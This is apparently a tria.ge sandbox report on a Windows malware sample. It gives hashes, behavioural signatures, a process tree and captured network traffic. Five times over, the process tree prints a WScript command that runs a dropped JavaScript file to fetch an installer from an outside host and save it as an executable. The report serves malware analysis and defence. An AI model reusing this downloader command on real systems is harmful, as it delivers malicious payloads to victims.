Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
134s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
31/05/2024, 09:51 UTC
Static task
static1
Behavioral task
behavioral1
Sample
8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe
-
Size
184KB
-
MD5
8695849edc287a9761aea3bab6a6feb1
-
SHA1
83bab866fb8ad5bc85e3024133799ff6d45add46
-
SHA256
91a34986c15dc37ac33b15e677f21940d992cf2c31b5af85d9ead18b251ef8a0
-
SHA512
ddb6ccf813f7d7a7f888417569c3fe5e4953ba832b1581231c5016062859292fe4d7c3faf9d98dd0c8987fe2c43c45501c7740ff80404b21d4286cafe30479b2
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3r:/7BSH8zUB+nGESaaRvoB7FJNndnO
Malware Config
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 6 1588 WScript.exe 38 4576 WScript.exe 40 3532 WScript.exe 52 3152 WScript.exe 54 4840 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2236 wrote to memory of 1588 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 82 PID 2236 wrote to memory of 1588 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 82 PID 2236 wrote to memory of 1588 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 82 PID 2236 wrote to memory of 4576 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 95 PID 2236 wrote to memory of 4576 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 95 PID 2236 wrote to memory of 4576 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 95 PID 2236 wrote to memory of 3532 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 96 PID 2236 wrote to memory of 3532 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 96 PID 2236 wrote to memory of 3532 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 96 PID 2236 wrote to memory of 3152 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 99 PID 2236 wrote to memory of 3152 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 99 PID 2236 wrote to memory of 3152 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 99 PID 2236 wrote to memory of 4840 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 100 PID 2236 wrote to memory of 4840 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 100 PID 2236 wrote to memory of 4840 2236 8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe2⤵
- Blocklisted process makes network request
PID:1588
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe2⤵
- Blocklisted process makes network request
PID:4576
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe2⤵
- Blocklisted process makes network request
PID:3532
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe2⤵
- Blocklisted process makes network request
PID:3152
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe2⤵
- Blocklisted process makes network request
PID:4840
-
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Requestwww.djapp.infoIN AResponse
-
Remote address:8.8.8.8:53Requestbi.downthat.comIN AResponsebi.downthat.comIN CNAMEtraff-2.hugedomains.comtraff-2.hugedomains.comIN CNAMEhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comIN A3.130.253.23hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comIN A3.130.204.160
-
GEThttp://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=WScript.exeRemote address:3.130.253.23:80RequestGET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: bi.downthat.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
date: Fri, 31 May 2024 09:51:14 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
-
Remote address:8.8.8.8:53Requestwww.hugedomains.comIN AResponsewww.hugedomains.comIN A172.67.70.191www.hugedomains.comIN A104.26.7.37www.hugedomains.comIN A104.26.6.37
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request23.253.130.3.in-addr.arpaIN PTRResponse23.253.130.3.in-addr.arpaIN PTRec2-3-130-253-23 us-east-2compute amazonawscom
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.dual-a-0034.a-msedge.netg-bing-com.dual-a-0034.a-msedge.netIN CNAMEdual-a-0034.a-msedge.netdual-a-0034.a-msedge.netIN A204.79.197.237dual-a-0034.a-msedge.netIN A13.107.21.237
-
GEThttps://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEBRemote address:204.79.197.237:443RequestGET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; domain=.bing.com; expires=Wed, 25-Jun-2025 09:51:15 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 89EF9A2B745D40058026FF2F5CFC4C20 Ref B: LON04EDGE0908 Ref C: 2024-05-31T09:51:15Z
date: Fri, 31 May 2024 09:51:15 GMT
-
GEThttps://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEBRemote address:204.79.197.237:443RequestGET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=DUezu6s2NXx1lXARAQZNY5x5o_X8JvkZfLImOc9eWgY; domain=.bing.com; expires=Wed, 25-Jun-2025 09:51:16 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E35DA7C48B504048A81B0152C3CCDAD0 Ref B: LON04EDGE0908 Ref C: 2024-05-31T09:51:16Z
date: Fri, 31 May 2024 09:51:16 GMT
-
GEThttps://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981Remote address:88.221.83.184:443RequestGET /aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1B834AF31E2D69D531A45E631F9668C3
ResponseHTTP/2.0 200
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A1BA0E349F0B455A9638F92E21D83B4C Ref B: DUS30EDGE0417 Ref C: 2024-05-31T09:51:16Z
content-length: 0
date: Fri, 31 May 2024 09:51:16 GMT
set-cookie: _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E; path=/; httponly; domain=bing.com
set-cookie: MUIDB=1B834AF31E2D69D531A45E631F9668C3; path=/; httponly; expires=Wed, 25-Jun-2025 09:51:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.b453dd58.1717149076.7ce5e78
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request72.32.126.40.in-addr.arpaIN PTRResponse
-
GEThttps://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90Remote address:88.221.83.184:443RequestGET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
accept: */*
cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E; MSPTC=DUezu6s2NXx1lXARAQZNY5x5o_X8JvkZfLImOc9eWgY; MUIDB=1B834AF31E2D69D531A45E631F9668C3
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QWthbWFp
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1107
date: Fri, 31 May 2024 09:51:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.b453dd58.1717149077.7ce6296
-
Remote address:8.8.8.8:53Request237.197.79.204.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request184.83.221.88.in-addr.arpaIN PTRResponse184.83.221.88.in-addr.arpaIN PTRa88-221-83-184deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request43.58.199.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request13.86.106.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.djapp.infoIN AResponse
-
Remote address:8.8.8.8:53Requestwww.djapp.infoIN AResponse
-
GEThttp://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=WScript.exeRemote address:3.130.253.23:80RequestGET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: bi.downthat.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
date: Fri, 31 May 2024 09:51:28 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
-
Remote address:8.8.8.8:53Requestwww.djapp.infoIN AResponse
-
GEThttp://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=WScript.exeRemote address:3.130.253.23:80RequestGET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: bi.downthat.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
date: Fri, 31 May 2024 09:51:39 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
-
Remote address:8.8.8.8:53Request86.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request206.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.djapp.infoIN AResponse
-
GEThttp://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=WScript.exeRemote address:3.130.253.23:80RequestGET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: bi.downthat.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
date: Fri, 31 May 2024 09:51:51 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
-
Remote address:8.8.8.8:53Requestwww.djapp.infoIN AResponse
-
GEThttp://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=WScript.exeRemote address:3.130.253.23:80RequestGET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: bi.downthat.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
date: Fri, 31 May 2024 09:52:04 GMT
location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
-
Remote address:8.8.8.8:53Request240.197.17.2.in-addr.arpaIN PTRResponse240.197.17.2.in-addr.arpaIN PTRa2-17-197-240deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request249.197.17.2.in-addr.arpaIN PTRResponse249.197.17.2.in-addr.arpaIN PTRa2-17-197-249deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request29.243.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesttse1.mm.bing.netIN AResponsetse1.mm.bing.netIN CNAMEmm-mm.bing.net.trafficmanager.netmm-mm.bing.net.trafficmanager.netIN CNAMEdual-a-0001.a-msedge.netdual-a-0001.a-msedge.netIN A204.79.197.200dual-a-0001.a-msedge.netIN A13.107.21.200
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 415458
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0F978301DD44494B80D2BA70EBAC885B Ref B: LON04EDGE0706 Ref C: 2024-05-31T09:52:55Z
date: Fri, 31 May 2024 09:52:55 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 430689
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E597BFFB31274B2B8745657D15644889 Ref B: LON04EDGE0706 Ref C: 2024-05-31T09:52:55Z
date: Fri, 31 May 2024 09:52:55 GMT
-
Remote address:8.8.8.8:53Request200.197.79.204.in-addr.arpaIN PTRResponse200.197.79.204.in-addr.arpaIN PTRa-0001a-msedgenet
-
3.130.253.23:80http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=httpWScript.exe691 B 283 B 6 3
HTTP Request
GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=HTTP Response
302 -
204.79.197.237:443https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEBtls, http22.5kB 9.0kB 20 17
HTTP Request
GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEBHTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEBHTTP Response
204 -
88.221.83.184:443https://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981tls, http21.4kB 5.3kB 16 10
HTTP Request
